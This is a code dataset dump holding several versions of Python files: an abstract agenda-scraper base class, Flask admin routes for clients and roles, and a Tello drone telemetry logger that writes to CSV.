store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda_item(self, agenda_item_data, agenda_item_id,\n meeting_id, meeting_time):\n \"\"\"\n The result of process agenda item will be a dict that can be stored by store_agenda_item\n \"\"\"\n pass\n <mask token>\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n\n @abstractmethod\n def scrape(self):\n \"\"\"\n Scrape processes all agendas in self._agenda_locations\n It calls process agenda on all items in _agenda_locations with \n data downloaded from those locations.\n The result of scrape is the stored agendas and agenda items.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda_item(self, agenda_item_data, agenda_item_id,\n meeting_id, meeting_time):\n \"\"\"\n The result of process agenda item will be a dict that can be stored by store_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda(self, processed_agenda, committee):\n \"\"\"\n Calls to DB should be here for the main agenda content\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-4": "from abc import ABC, abstractmethod, abstractproperty\nfrom pytz import timezone\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n\n @abstractmethod\n def scrape(self):\n \"\"\"\n Scrape processes all agendas in self._agenda_locations\n It calls process agenda on all items in _agenda_locations with \n data downloaded from those locations.\n The result of scrape is the stored agendas and agenda items.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda_item(self, agenda_item_data, agenda_item_id,\n meeting_id, meeting_time):\n \"\"\"\n The result of process agenda item will be a dict that can be stored by store_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda(self, processed_agenda, committee):\n \"\"\"\n Calls to DB should be here for the main agenda content\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-5": null,
"step-ids": [
8,
10,
11,
12
]
}
|
[
8,
10,
11,
12
] |
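The abstract methods above lay out a fixed pipeline: discover agenda locations, scrape and process each agenda, then persist agendas and their items. A minimal sketch of a concrete subclass follows; the endpoint URL, the requests calls, and the dict shapes are illustrative assumptions, not part of the original interface.

import requests  # assumed HTTP client; the interface does not mandate one


class DemoCityScraper(EngageScraper):  # EngageScraper as defined above

    def __init__(self):
        super().__init__('America/Los_Angeles')

    def get_available_agendas(self):
        # Assumed index endpoint returning a JSON list of agenda URLs.
        self.agenda_locations = requests.get('https://example.org/agendas.json').json()

    def scrape(self):
        for meeting_id, url in enumerate(self.agenda_locations):
            agenda = self._process_agenda(requests.get(url).text, meeting_id)
            saved = self._store_agenda(agenda, committee='council')
            self._store_agenda_items(agenda, saved)

    def _process_agenda(self, agenda_data, meeting_id):
        # Real parsing (BeautifulSoup, lxml, ...) would go here.
        return {'meeting_id': meeting_id, 'items': []}

    def _scrape_agenda_item(self, agenda_item_location):
        return requests.get(agenda_item_location).text

    def _process_agenda_item(self, agenda_item_data, agenda_item_id, meeting_id, meeting_time):
        return {'id': agenda_item_id, 'meeting': meeting_id, 'time': meeting_time}

    def _store_agenda(self, processed_agenda, committee):
        return processed_agenda  # a real implementation would write to a DB

    def _store_agenda_items(self, agenda_dict, agenda_saved):
        pass  # likewise persisted in a real implementation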
# coding: utf-8
from flask import Blueprint, make_response, render_template, request
from flask_restful import Resource
from flask_security import login_required
from ..clients.service import list_clients
from ..roles.service import list_roles
from ...models import Client, Role
admin = Blueprint('admin', __name__, url_prefix='/passport/admin')
@admin.route('/', methods=['GET'])
@login_required
def index():
headers = {'Content-Type': 'text/html'}
return make_response(render_template(
'index.html'), headers)
@admin.route('/clients/<client_id>', methods=['GET'])
@admin.route('/clients/new', methods=['GET'])
@admin.route('/clients', methods=['GET'])
@login_required
def clients(client_id=None):
headers = {'Content-Type': 'text/html'}
if request.path[-4:] == '/new':
clients = [Client()]
operation_type = 'new'
else:
clients = list_clients(client_id)
operation_type = 'list' if not client_id else 'edit'
return make_response(render_template(
'clients.html', clients=clients, operation_type=operation_type))
@admin.route('/roles/<role_id>', methods=['GET'])
@admin.route('/roles/new', methods=['GET'])
@admin.route('/roles', methods=['GET'])
@login_required
def roles(role_id=None, operation_type=None):
headers = {'Content-Type': 'text/html'}
if request.path[-4:] == '/new':
roles = [Role()]
operation_type = 'new'
if not operation_type:
roles = list_roles(role_id)
operation_type = 'list' if not role_id else 'edit'
return make_response(render_template(
'roles.html', roles=roles, operation_type=operation_type))
|
normal
|
{
"blob_id": "f5f1a4db33cea8421cb4236606dfb288efee7621",
"index": 2142,
"step-1": "<mask token>\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n<mask token>\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-2": "<mask token>\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n return make_response(render_template('clients.html', clients=clients,\n operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-3": "<mask token>\nadmin = Blueprint('admin', __name__, url_prefix='/passport/admin')\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n return make_response(render_template('clients.html', clients=clients,\n operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-4": "from flask import Blueprint, make_response, render_template, request\nfrom flask_restful import Resource\nfrom flask_security import login_required\nfrom ..clients.service import list_clients\nfrom ..roles.service import list_roles\nfrom ...models import Client, Role\nadmin = Blueprint('admin', __name__, url_prefix='/passport/admin')\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n return make_response(render_template('clients.html', clients=clients,\n operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-5": "# coding: utf-8\nfrom flask import Blueprint, make_response, render_template, request\nfrom flask_restful import Resource\nfrom flask_security import login_required\n\nfrom ..clients.service import list_clients\nfrom ..roles.service import list_roles\nfrom ...models import Client, Role\n\n\nadmin = Blueprint('admin', __name__, url_prefix='/passport/admin')\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template(\n 'index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n\n return make_response(render_template(\n 'clients.html', clients=clients, operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n\n return make_response(render_template(\n 'roles.html', roles=roles, operation_type=operation_type))\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
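A quick way to exercise these routes is Flask's test client. The sketch below assumes a hypothetical application factory named create_app that registers the admin blueprint and configures flask_security; with no authenticated user, the @login_required views typically redirect to the login page.

from myapp import create_app  # create_app is an assumed factory, not shown above

app = create_app()
with app.test_client() as client:
    # Anonymous requests to @login_required views are usually redirected.
    assert client.get('/passport/admin/').status_code in (301, 302)
    assert client.get('/passport/admin/clients').status_code in (301, 302)
    assert client.get('/passport/admin/roles/new').status_code in (301, 302)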
<|reserved_special_token_0|>
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
        ___Naming convention for the table files___
        Where x is the table number and y the flight duration in seconds
        1. Window closed and door closed: x_tudoFechado_y.csv
        2. Window open and door open: x_janelaPortaAberta_y.csv
        3. Window and door open, with a fan pointed at the drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
                    timestamp = int(round(time.time() * 1000)) # Create a timestamp the moment the data is received
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
                        item[21], item[23], item[25], item[27], item[29], item[31]] # Append the new values as a new row of the DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
        print('Battery level is: {}'.format(str(bateria)))
        print('Start time was {}'.format(str(tempo1)))
        print('End time was {}'.format(str(tempo2)))
        while int(tempo2) - int(tempo1) < 10:
            print('Battery level is: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
        ___Naming convention for the table files___
        Where x is the table number and y the flight duration in seconds
        1. Window closed and door closed: x_tudoFechado_y.csv
        2. Window open and door open: x_janelaPortaAberta_y.csv
        3. Window and door open, with a fan pointed at the drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
                    timestamp = int(round(time.time() * 1000)) # Create a timestamp the moment the data is received
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
                        item[21], item[23], item[25], item[27], item[29], item[31]] # Append the new values as a new row of the DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
        print('Battery level is: {}'.format(str(bateria)))
        print('Start time was {}'.format(str(tempo1)))
        print('End time was {}'.format(str(tempo2)))
        while int(tempo2) - int(tempo1) < 10:
            print('Battery level is: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
        ___Naming convention for the table files___
        Where x is the table number and y the flight duration in seconds
        1. Window closed and door closed: x_tudoFechado_y.csv
        2. Window open and door open: x_janelaPortaAberta_y.csv
        3. Window and door open, with a fan pointed at the drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
                    timestamp = int(round(time.time() * 1000)) # Create a timestamp the moment the data is received
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
                        item[21], item[23], item[25], item[27], item[29], item[31]] # Append the new values as a new row of the DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
        print('Battery level is: {}'.format(str(bateria)))
        print('Start time was {}'.format(str(tempo1)))
        print('End time was {}'.format(str(tempo2)))
        while int(tempo2) - int(tempo1) < 10:
            print('Battery level is: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from djitellopy import Tello
import time
import threading
import pandas as pd
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
        ___Naming convention for the table files___
        Where x is the table number and y the flight duration in seconds
        1. Window closed and door closed: x_tudoFechado_y.csv
        2. Window open and door open: x_janelaPortaAberta_y.csv
        3. Window and door open, with a fan pointed at the drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
                    timestamp = int(round(time.time() * 1000)) # Create a timestamp the moment the data is received
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
                        item[21], item[23], item[25], item[27], item[29], item[31]] # Append the new values as a new row of the DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
        print('Battery level is: {}'.format(str(bateria)))
        print('Start time was {}'.format(str(tempo1)))
        print('End time was {}'.format(str(tempo2)))
        while int(tempo2) - int(tempo1) < 10:
            print('Battery level is: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from djitellopy import Tello
import time
import threading
import pandas as pd
class DataTello:
def __init__(self):
        # Create the Tello control object
        self.tello = Tello()
        # List where the data collected from the Tello is stored
        self.__data = []
        self.__array = []
        # Flight time in milliseconds
        self.tempoVoo = 420000
        '''
        ___Naming convention for the table files___
        Where x is the table number and y the flight duration in seconds
        1. Window closed and door closed: x_tudoFechado_y.csv
        2. Window open and door open: x_janelaPortaAberta_y.csv
        3. Window and door open, with a fan pointed at the drone: x_janelaPortaAbertaVentilador_y.csv
        '''
        # File name pattern
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz',
'templ', 'temph', 'tof',
'height', 'battery', 'barometer',
'time', 'agx', 'agy', 'agz'])
'''
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
                    timestamp = int(round(time.time() * 1000)) # Create a timestamp the moment the data is received
                    self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], 
                        item[9], item[11], item[13], item[15], item[17], item[19], 
                        item[21], item[23], item[25], item[27], item[29], item[31]] # Append the new values as a new row of the DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
'''
def fly(self):
        # Take off, collect state data for tempoVoo milliseconds, then land and write the CSV.
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while ((timestampFinal - timestampInicial) < self.tempoVoo):
try:
                timestampFinal = int(round(time.time() * 1000)) # Create a timestamp the moment the data is received
self.__data.append(self.tello.get_states())
if (not len(self.__data) % 20 == 0):
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print ('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
            timestamp = int(round(time.time() * 1000)) # Create a timestamp the moment the data is received
            self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], 
                item[9], item[11], item[13], item[15], item[17], item[19], 
                item[21], item[23], item[25], item[27], item[29], item[31]] # Append the new values as a new row of the DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:(len(tempo1)-1)]
#time.sleep(3)
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:(len(tempo2)-1)]
        print('Battery level is: {}'.format(str(bateria)))
        print('Start time was {}'.format(str(tempo1)))
        print('End time was {}'.format(str(tempo2)))
        while ((int(tempo2) - int(tempo1)) < 10):
            print('Battery level is: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:(len(tempo2)-1)]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
#dataTello.stop()
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "9e751bbddabbec7c5e997578d99ef1b8c35efe06",
"index": 8108,
"step-1": "<mask token>\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], 